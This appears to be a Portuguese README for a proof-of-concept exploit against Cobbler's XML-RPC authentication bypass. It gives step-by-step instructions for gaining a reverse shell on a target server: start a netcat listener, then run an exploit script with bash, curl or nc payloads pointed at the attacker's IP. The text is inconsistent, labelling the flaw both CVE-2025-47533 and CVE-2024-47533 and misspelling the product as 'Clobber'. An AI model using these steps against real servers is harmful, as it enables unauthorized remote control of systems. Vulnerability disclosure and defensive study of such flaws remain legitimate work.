
PoC do CVE-2025-47533 Clobber RCE
Cobbler, um servidor de instalação Linux que permite a configuração rápida de ambientes de instalação em rede, possui uma vulnerabilidade de autenticação nas versões 3.0.0 até (mas não incluindo) 3.2.3 e 3.3.7. A função utils.get_shared_secret() sempre retorna -1, permitindo que qualquer pessoa se conecte à interface XML-RPC do Cobbler com um nome de usuário vazio ('') e senha -1. Isso permite que um atacante com acesso à rede obtenha controle total do servidor Cobbler. A vulnerabilidade é corrigida nas versões 3.2.3 e 3.3.7.
A vulnerabilidade é causada pelo tratamento inadequado do segredo compartilhado na função utils.get_shared_secret(), que sempre retorna -1, efetivamente contornando a autenticação. Isso permite que qualquer usuário da rede se conecte à interface XMLRPC do Cobbler com credenciais vazias e execute comandos arbitrários.
http://<target>:25151/ — Endpoint da API XMLRPC do Cobbler
O script de exploração suporta vários payloads de reverse shell, incluindo:
nc)Inicie um listener Netcat na sua máquina:
nc -lvnp 4444
Execute o script de exploração CVE-2024-47533.py.
python3 CVE-2024-47533.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash
-t : Alvo (Exemplo: -t http://1<IP_SERVICE>:<PORT>)
-l: IP Local (Exemplo: -l 10.10.11.80)
-p : Porta <LOCAL_PORT> (Exemplo: -p 4444)
--payload: Payload (bash, curl, nc) (Exemplo: --payload bash)
Após a execução bem-sucedida, o reverse shell se conectará de volta ao listener, concedendo ao atacante acesso remoto ao servidor.